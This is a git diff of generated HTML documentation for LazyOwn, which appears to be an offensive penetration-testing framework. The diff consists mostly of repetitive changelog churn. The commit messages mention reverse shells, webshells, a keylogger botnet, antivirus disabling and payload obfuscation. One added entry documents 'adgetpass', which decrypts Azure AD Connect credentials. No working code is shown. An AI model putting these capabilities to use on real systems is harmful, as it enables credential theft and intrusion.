- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -2378,8 +2394,8 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -2387,24 +2403,24 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
some changes in the web 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
comming soon tryhackme 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -2413,40 +2429,40 @@
Otros
readmeneitor.py :P 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
fancy proompt :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 bug
fixing 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
👽👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
3ast3r366 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -2454,8 +2470,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -2463,8 +2479,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -2472,31 +2488,31 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
command launchpad to recon Linux OS 👽
-Otros
Otros
+Otros
- Merge pull request #27 from grisuno/clcthulhu-patch-1
Documentación
-Otros
+Otros
- docs(update readme description): change of the description; Update
README.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -2504,40 +2520,40 @@
Otros
VERSION 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
mejorando la documentaciòn 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
commands rulencode, urldecode, y lynis documented at COMMANDS.md 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
@@ -2545,24 +2561,24 @@
Otros
hashcat, more soon :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 new
commands documented at COMMANDS.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
Magicgardens is so insane but pwned :)
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -2570,8 +2586,8 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -2579,302 +2595,302 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new machine magic gardens insane machine because resource was
pwned and sea not was released yet
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new tools for pwntomate :D
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new machine comprezzor.htb
-Otros
Otros
+Otros
- 👽 new script readmeneitor req updated
-Otros
Otros
+Otros
- 👽 new script readmeneitor to help me update the readme xD
-Otros
Otros
+Otros
- 👽 new command ssh 22 and if u have file sessions/credentials.txt
this will open ssh conection :)
-Otros
Otros
+Otros
- 👽 bug fixing and replace command nc with pwncatcs more fancy and
sharp :)
-Otros
Otros
+Otros
- 👽 bug fixing in wfuzz sub command wen you not pass the domain
-Otros
Otros
+Otros
- 👽 some changes in nmap script now discovery have template html too
and we have a little index2.html to navigate the reports.
-Otros
Otros
+Otros
- 👽 some littles changes :)
-Otros
Otros
+Otros
- 👽 new machine compiled :)
-Otros
Otros
+Otros
- 👽 new command disableav to create a aav.vbs to disable av if it’s
possible :)
-Otros
Otros
+Otros
- 👽 changing the command in venom :)
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb now pwned with my user :P its rally insane
amount of work to pwn
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb machine cost to me one week and my mental
health xD bu it’s pwned xD
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 chisel fix copy to clipboard commad bug …
-Otros
Otros
+Otros
- 👽 command list to update the readme: todo …
-Otros
Otros
+Otros
- 👽 no more prints ( 👽 we have 13 xD) now we have technologì we have
print_msg, print_error & print_warn :) so much pretty
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new brothers commands, LazyOwn> winbase64payload and
asprevbase64 👽
-Otros
Otros
+Otros
- some roder to prints, not finished yet but the storm its cut the
electricity so commit….
-Otros
Otros
+Otros
- feat: somo testing and alias now you can run gpt alias :D
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :) fixing
error path from json files :P
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :)
-Otros
Otros
+Otros
- feat: more time to the nmap to finished and pyautomate
autostart
-Otros
Otros
+Otros
- feat: New stylesheet for Nmap reports, making them more professional
@@ -2883,45 +2899,45 @@
Otros
soon
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources and
exploits :D new msf autoroute :D
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources adn
exploits :D
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 command
@@ -2929,48 +2945,48 @@
Otros
charge an iccon from our smbserver and the hash is ours
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command getnpusers
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅. jejejjejej
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now with
pwntomate to automate with the command pyautomate
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
@@ -2978,8 +2994,8 @@
Otros
pleasssure. xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -2987,8 +3003,8 @@
Otros
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 socat
@@ -2997,101 +3013,101 @@
Otros
perform a malicious shortcut lnk attack with msfvenom
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some
format….
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 …
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
arguments :) -c command ex ping
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
aliases :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
options like –help, -v and –no-banner :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :) now in white xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
newhashcat
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -3099,8 +3115,8 @@
Otros
better now with recognice automate download_resource
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 another
@@ -3109,40 +3125,40 @@
Otros
xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 was banned
from htb to spoiler jajjajaj xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 msf
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -3150,24 +3166,24 @@
Otros
cports
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 clean
command to clean up the mess and pwn the next machine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
commands pwd, sh
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
@@ -3175,72 +3191,72 @@
Otros
vpn, rev, banner :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New Colors
:D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding run
script to run lazyown with virtual env activated to avoid errors
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to exit as q :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to commands its una shulada
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to list command :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
in form of colored strings :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to some prints :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command py3ttyup to upgrade to tty your rev shell :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -3249,8 +3265,8 @@
Otros
fixperms :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -3258,120 +3274,120 @@
Otros
where lazyown dump scripts like revertshells, webshells, etc.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 solarlab
pwned :D new machine MagicGardens
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine solarlab :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
revshell.c and machine powned xD axlle hard
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
commands createrevshell y createwinrevshell
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 FormulaX
pwned :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer Pwned :P new new new FormulaX :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Skyfall Linux insane machine, Blazorized was powned :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Blazorized.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb pwned
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new tool
in external :) https://github.com/BloodHoundAD/SharpHound.git :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine Blazorized.htb :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -3379,24 +3395,24 @@
Otros
relative/path/show/in/searchexploit when you use the flag -x :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command dsnmap :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
machine Runner.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -3404,223 +3420,223 @@
Otros
:)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command :) samrdump
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 news
script bruteforce on modules :) :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command dnsenum :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :) to se use tab tab or ?
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new payloads in sessions directory :) :) :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new exploits :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new command run lazywerkzeugdebug
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new commands createhash, createwebshell, sqlmap, proxy,
john2hash
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create internal_discover.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 2 new exploit external :D working like a charm
-Otros
Otros
+Otros
- new exploit werkzeug in debug mode lettle retocated to run in
python3 from searchsploit :D
-Otros
Otros
+Otros
- new command: exploits externals :D
-Otros
Otros
+Otros
- new command: smbmap whattomap ex: smbmap tmp :D
-Otros
Otros
+Otros
- go buster new parameter url to use url from payload not rhost
-Otros
Otros
+Otros
- parameter added to gospider url to use var url in payload not rhost
@@ -3628,66 +3644,66 @@
Otros
parameter to /etc/hosts not now to windows sistems sorry
-Otros
Otros
+Otros
- refactor global var rhost deleted other ones
-Otros
Otros
+Otros
- path hijacking add line to temp bash script
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command: wfuzz :D and you can add example a hide line option
like # wfuzz –hl=9 to hide responses with long line to 9
-Otros
Otros
+Otros
- new command: run lazyssh77enum to enum using a wordlist and exploit
foound searchsploit as openssh 7.7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- smbclient command and exploit to enum ssh i used in a machine of
@@ -3695,269 +3711,269 @@
Otros
xD
-Otros
Otros
+Otros
- Merge pull request #22 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command getseclist :D
-Otros
Otros
+Otros
- payload.json to play on hackthebox :D
-Otros
Otros
+Otros
- port a python del exploit archiconocido de meta exploit vsftpd
3.0.3
-Otros
Otros
+Otros
- shell payload in python generated by msfvenom automated by lazyown
framework ;)
-Otros
Otros
+Otros
- new commit to check if alsr is activated in the kernel
-Otros
Otros
+Otros
- deleted shells generated by the script
-Otros
Otros
+Otros
- upx to shells generated by msfvenom automated by lazyown framework
;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new path to diccionary to run by default in parrot
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #21 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy ntlmv2 firstaproach using in hashes.txt the ouput smbserver
command when the conection is established
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy get smbserver with impacket :) and then you can sudo
@@ -3965,1354 +3981,1354 @@
Otros
simple smbserver in LazyOwn console
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn FTP sniff prety messages :)
-Otros
Otros
+Otros
- LazyOwn keygen to generate keys to use in payload.json to cypher the
conections
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn http sniff :( not working fine yet
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing README and banner :P [;,;]
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing [;,;]
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy Log more lfi list :)
-Otros
Otros
+Otros
- Lazy Log Poisonig more poison bro
-Otros
Otros
+Otros
- Lazy Log Poisonig in ssh first aproach
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Delete lazylogpisoning.py
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- add #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- tentativas de herramientas nuevas
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- imlementacion de libreria pwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- mejora en la webshell de python
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- return jsonify({“error”: “error”}), 500
-Otros
Otros
+Otros
- Fix code scanning alert - Information exposure through an exception
#16
-Otros
Otros
+Otros
- Fix code scanning alert - Flask app is run in debug mode #17
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva interfaz web experimental
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo bot de investigacion
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- New BotNet with Keylogger
-Otros
Otros
+Otros
- Merge pull request #13 from grisuno/grisuno-patch-7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
- device to sniff parametric
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo modulo de gathering
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva estructura de directorios
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #10 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #8 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_metaextract0r.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_bprfuzzer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #6 from grisuno/grisuno-patch-5
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update lazyreverse_shell.sh
-Otros
Otros
+Otros
- Merge pull request #5 from grisuno/grisuno-patch-4
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyreverse_shell.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #4 from grisuno/grisuno-patch-3
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create CODE_OF_CONDUCT.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #3 from grisuno/grisuno-patch-2
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #1 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- ██╗ █████╗ ███████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗ ██║
@@ -5323,64 +5339,64 @@
Otros
╚══╝╚══╝ ╚═╝ ╚═══╝
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create bin_data_relevant.csv
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create detailed_search.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update README.md
diff --git a/docs/COMMANDS.html b/docs/COMMANDS.html
index 727b6a98..975450d7 100644
--- a/docs/COMMANDS.html
+++ b/docs/COMMANDS.html
@@ -4276,6 +4276,20 @@ h
Note: - Ensure that tmux is installed and properly configured on the
system. - The method assumes that the session name is defined and
accessible in the scope where this method is called.
+adgetpass
+Command adgetpass: Generates a PowerShell script to extract
+credentials from Azure AD Connect Sync.
+This function generates a PowerShell script based on user inputs,
+including the SQL server, database, and custom keyset values. The script
+retrieves encryption keys, decrypts credentials, and outputs the domain,
+username, and password from the AD Sync configuration.
+Args: line (str): Optional argument to specify the server name,
+database name, and other options in the following format: “server_name
+database_name keyset_id instance_id entropy”.
+Returns: None
+Example: adgetpass MONTEVERDE ADSync 1
+1852B527-DD4F-4ECF-B541-EFCCBFF29E31
+194EC2FC-F186-46CF-B44D-071EB61F49CD
find_tgts
Finds and returns a list of target hosts with port 445 open in the
specified subnet.
diff --git a/docs/README.html b/docs/README.html
index fa6530a1..100ad2d8 100644
--- a/docs/README.html
+++ b/docs/README.html
@@ -5735,6 +5735,20 @@ h
Note: - Ensure that tmux is installed and properly configured on the
system. - The method assumes that the session name is defined and
accessible in the scope where this method is called.
+adgetpass
+Command adgetpass: Generates a PowerShell script to extract
+credentials from Azure AD Connect Sync.
+This function generates a PowerShell script based on user inputs,
+including the SQL server, database, and custom keyset values. The script
+retrieves encryption keys, decrypts credentials, and outputs the domain,
+username, and password from the AD Sync configuration.
+Args: line (str): Optional argument to specify the server name,
+database name, and other options in the following format: “server_name
+database_name keyset_id instance_id entropy”.
+Returns: None
+Example: adgetpass MONTEVERDE ADSync 1
+1852B527-DD4F-4ECF-B541-EFCCBFF29E31
+194EC2FC-F186-46CF-B44D-071EB61F49CD
find_tgts
Finds and returns a list of target hosts with port 445 open in the
specified subnet.
@@ -5908,6 +5922,18 @@ Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
+README.md - docs/README.html - docs/index.html - docs/index.html.bak -
+lazyown - sessions/users.txtLazyOwn on HackTheBox:
+https://app.hackthebox.com/teams/overview/6429 LazyOwn/
+https://grisuno.github.io/LazyOwn/ Fecha: Sat Oct 19 00:18:05 2024 -0300
+Hora: 1729307885
+
+
+Pruebas
+Otros
+
+
+- test(test): test Version: release/0.1.64 test Modified file(s):-
.gitignore - COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html -
docs/README.html - docs/UTILS.html - docs/index.html -
docs/index.html.bak - firefox.dmp - lazyown - utils.pyfile(s):-
@@ -5917,8 +5943,8 @@
Otros
Hora: 1729226236
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.64 image banner responsive
@@ -5929,8 +5955,8 @@
Otros
Hora: 1729225810
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
@@ -5941,8 +5967,8 @@
Otros
Hora: 1729219689
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -5958,8 +5984,8 @@
Otros
Hora: 1729047333
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -5969,8 +5995,8 @@
Otros
Hora: 1729039733
-Pruebas
